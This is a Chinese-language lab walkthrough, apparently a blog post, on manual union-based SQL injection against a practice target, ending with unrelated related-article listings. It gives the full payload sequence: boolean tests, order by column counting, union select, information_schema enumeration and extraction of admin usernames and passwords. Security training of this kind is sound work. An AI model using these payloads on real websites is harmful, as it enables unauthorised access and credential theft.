通过SQL手工注入拿到管理员密码–辛巴猫舍

靶场地址: http://rhiq8003.ia.aqlab.cn/


点击新闻页面看看

域名后面加上了id=1,说明存在着数据库的交互

那么这里就很有可能是注入点

把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1

进入手工注入步骤

第一步 判断是否存在SQL注入漏洞

构造and 1=1,这个语句是恒成立的,一般页面都是不报错的

再来试试1=2

出错,初步说明存在着注入漏洞

第二步 判断数据库字段数

在这里会使用到order by() 函数,它会根据后面的参数来改变排序顺序,比如数据库里有多个列,根据选取的列明,id,name,来排序

构造?id=1 and 1=1 order by 1 页面没有变化(order by 1表示根据第一列来排序,一般也是如此默认升序的)

再来依次构造order by 2 / order by 3

由MySQL的语法有,order by后面的数据超过列数后将会报错,因此用种方法来判断一共有几个字段

当进行到order by 3 后,页面显示错误,因此判断一共只有两个字段

第三步 判断回显点

回显点就是在页面中能显示数据库信息的板块,比如有的网页中“浏览次数”“发布时间”等,都反应的是数据库中的数据

于是我们使用联合查询

我们同时查询这两个数据

但要注意的是,在MySQL语句中,页面一次只能显示一行查询的内容,而且是先查后显示,于是我们需要让前面的语句?id=1 and 1=1这句话失效,从而显示union select 1,2的内容

因此我们让前一个命令报错无法显示,即构造?id=1 and 1=2,后面照常union select 1,2

这样就完全没用

必须构造1=2

找到了回显点2

第四步 查询相关内容

1.查询表

已知2为回显点,我们只需要在联合查询时将2替代为我们想要查询到部位名称即可

可以查询当前的数据库名,将2替换为database()

构造id=1 and 1=2 union select 1,database()

数据库名为maoshe

查询当前数据库 表名

?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
(tips:group_concat()函数是将查询结果放到同一行)

查询到的数据库名为admin,dirs,news,xss

一般关于管理员的信息都在admin表中

2.查询字段名

查询admin表的列名

构造 ?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’

第一列是id,第二列是username,第三列是password

该有的信息都找到了,直接查询就行了

3.查询字段内容

构造 ?id=1 and 1=2 union select 1,group_concat(username) from admin
查询登陆用户名

构造 ?id=1 and 1=2 union select 1,group_concat(password) from admin
查询密码

通过SQL手工注入拿到管理员密码--辛巴猫舍相关推荐

  1. SQL注入靶场:辛巴猫舍

    查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:i ...

  2. SQL手工注入原理万能密码及默认密码登陆后台

    SQL手工注入原理: 下面就是比较笨的方法了==    一个一个试 (* ̄rǒ ̄) 针对于.asp后缀网 + ?id_  在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...

  3. python sql注入脚本_python辅助sql手工注入猜解数据库案例分析

    发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...

  4. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  5. 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)

    问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...

  6. SQL手工注入漏洞测试(Oracle数据库)

    SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...

  7. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  8. 墨者学院SQL手工注入靶场漏洞详解

    墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...

  9. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

最新文章

  1. linux 下修改文件描述符限制
  2. EMC NetWorker恢复oracle指南
  3. RabbitMQ 的引言
  4. server2008R2平台部署exchange2010
  5. D - Delete Prime Gym - 102875D
  6. mysql无法启动如何备份文件_mysql 5.7 停电导致无法启动、如何备份数据,重新安装mysql...
  7. Flutter项目实战教程分享、基础使用、性能优化、每日积累
  8. 菜鸟学习笔记:Java提升篇8(线程2——线程的基本信息、线程安全、死锁、生产者消费者模式、任务调度)
  9. elasticsearch的一个bug总结
  10. 支持magento扩展性的几个特性
  11. oracle服务端导出/导入方式expdp/impdp
  12. 5分钟内快速上手掌握springtx事务以及注解的使用
  13. 回顾IDEA全局搜索快捷键
  14. 无法找到资源编辑器dll
  15. java解析marc乱码_国际C语言乱码大赛(IOCCC)的一个经典作品
  16. 汇编/源操作数/目的操作数
  17. 苹果企业级开发者账号申请详解
  18. java调用opencc将中文简体繁体转换
  19. 微分中值定理——(罗尔定理、拉格朗日定理、导数极限定理、达布定理、柯西定理)
  20. 奥维奥:新零售下,家具家居该如何乘风破浪?

热门文章

  1. 优秀的领导与糟糕的领导
  2. Python学习笔记(二)情侣关系的典范——————字典
  3. Python 的诞生与应用
  4. 基于Go语言Beego+Layui实现的毕业设计神器
  5. Lua + Redis 优惠券领券设计
  6. 【Java】爬虫,能不能再详细讲讲?万字长文送给你!
  7. Sublime Text 最新注册码
  8. [掌心网]苹果iPhone开发者的Windows Phone 7使用报告
  9. XposedInstaller框架未安装解决方法-ADB shell 离线安装-2023年-安卓 Android 6
  10. java调用asmx接口_java调用.net写的webserver接口(.asmx后缀)